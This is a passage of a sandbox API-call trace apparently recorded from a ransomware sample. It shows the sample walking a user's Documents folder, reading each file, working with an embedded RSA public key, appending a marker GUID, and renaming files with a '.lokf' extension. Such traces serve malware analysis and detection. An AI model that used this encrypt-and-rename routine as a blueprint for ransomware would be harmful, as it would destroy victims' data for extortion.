hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.612] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c88ae8*, nNumberOfBytesToWrite=0x15b0c, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c88ae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x15b0c, lpOverlapped=0x0) returned 1 [0059.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88ae8 | out: hHeap=0x660000) returned 1 [0059.613] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15b11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.613] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0059.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0059.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.613] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3294ac8 [0059.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0059.613] WriteFile (in: hFile=0x5cc, lpBuffer=0x3294ac8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3294ac8*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294ac8 | out: hHeap=0x660000) returned 1 [0059.613] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.613] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.613] CloseHandle (hObject=0x5cc) returned 1 [0059.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.614] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.615] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\qsrLr5Sl.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\qsrlr5sl.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\qsrLr5Sl.csv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\qsrlr5sl.csv.lokf")) returned 1 [0059.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.615] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201e90 | out: hHeap=0x660000) returned 1 [0059.616] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68462f60, ftCreationTime.dwHighDateTime=0x1d4c6d9, ftLastAccessTime.dwLowDateTime=0xfbb4e9a0, ftLastAccessTime.dwHighDateTime=0x1d4ce75, ftLastWriteTime.dwLowDateTime=0xfbb4e9a0, ftLastWriteTime.dwHighDateTime=0x1d4ce75, nFileSizeHigh=0x0, nFileSizeLow=0x7206, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tdc1X rXuBGflZJUC.xls", cAlternateFileName="TDC1XR~1.XLS")) returned 1 [0059.616] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0059.616] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201e90 [0059.616] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.616] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\tdc1X rXuBGflZJUC.xls") returned=".xls" [0059.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\tdc1X rXuBGflZJUC.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\tdc1x rxubgflzjuc.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.616] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=29190) returned 1 [0059.616] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.619] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x71e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.619] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.619] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.619] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.619] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.619] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x7206, lpOverlapped=0x0) returned 1 [0059.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.620] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.620] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8610) returned 1 [0059.620] CryptCreateHash (in: hProv=0x6b8610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.621] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.621] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.621] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.621] GetLastError () returned 0x0 [0059.621] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.621] CryptReleaseContext (hProv=0x6b8610, dwFlags=0x0) returned 1 [0059.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.621] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.621] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.621] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7210) returned 0x9c88ae8 [0059.621] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c87fc8 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6d0 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88010 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b6e8 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85728 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85740 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85758 [0059.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.622] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85728 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85740 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85728 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85740 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85758 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85740 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85728 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.622] GetCurrentThreadId () returned 0x9e0 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c84028 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8610 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.623] GetCurrentThreadId () returned 0x9e0 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85728 [0059.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85740 [0059.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.624] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.624] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.624] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.624] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.624] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7206, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.624] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.624] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.624] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.624] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.624] CloseHandle (hObject=0x5cc) returned 1 [0059.625] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\tdc1X rXuBGflZJUC.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\tdc1x rxubgflzjuc.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\tdc1X rXuBGflZJUC.xls.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\tdc1x rxubgflzjuc.xls.lokf")) returned 1 [0059.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.626] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.626] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201e90 | out: hHeap=0x660000) returned 1 [0059.627] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5ae690, ftCreationTime.dwHighDateTime=0x1d4c94a, ftLastAccessTime.dwLowDateTime=0x744b50f0, ftLastAccessTime.dwHighDateTime=0x1d4d049, ftLastWriteTime.dwLowDateTime=0x744b50f0, ftLastWriteTime.dwHighDateTime=0x1d4d049, nFileSizeHigh=0x0, nFileSizeLow=0x18ef7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wdJqAyQOW.ots", cAlternateFileName="WDJQAY~1.OTS")) returned 1 [0059.627] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\wdJqAyQOW.ots") returned=".ots" [0059.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\wdJqAyQOW.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\wdjqayqow.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.627] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=102135) returned 1 [0059.627] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.629] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x18ed1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.629] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.630] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x18ef7, lpOverlapped=0x0) returned 1 [0059.631] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.631] lstrlenA (lpString="-----BEGIN PUBLIC 